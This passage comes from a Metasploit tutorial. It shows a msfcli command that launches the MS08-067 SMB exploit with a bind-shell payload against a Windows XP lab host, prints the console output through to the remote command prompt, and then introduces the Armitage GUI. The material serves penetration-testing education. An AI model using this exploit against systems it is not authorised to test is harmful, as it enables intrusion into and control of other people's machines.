Metasploit Basics
Compatible payloads
===================

   Name                    Description
   ----                    -----------
   generic/debug_trap      Generate a debug trap in the target process
   generic/shell_bind_tcp  Listen for a connection and spawn a command shell
Having set all the required options for our exploit and selected a payload, we can run our exploit by passing the letter E to the end of the msfcli argument string, as shown here:

root@bt:/# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 PAYLOAD=windows/shell/bind_tcp E
[*] Please wait while we load the module tree...
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.101:46025 -> 192.168.1.155:4444)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
We’re successful, because we have received a Windows command prompt from the remote system.
Armitage
The armitage component of Metasploit is a fully interactive graphical user interface created by Raphael Mudge. This interface is highly impressive, feature rich, and available for free. We won’t be covering armitage in depth, but it is definitely worth mentioning as something to explore. Our goal is to teach the ins and outs of Metasploit, and the GUI is awesome once you understand how the Framework actually operates.
Running Armitage
To launch armitage, run the command armitage. During startup, select Start MSF, which will allow armitage to connect to your Metasploit instance.

root@bt:/opt/framework3/msf3# armitage
After armitage is running, simply click a menu to perform a particular attack or access other Metasploit functionality. For example, Figure 2-1 shows the browser (client-side) exploits.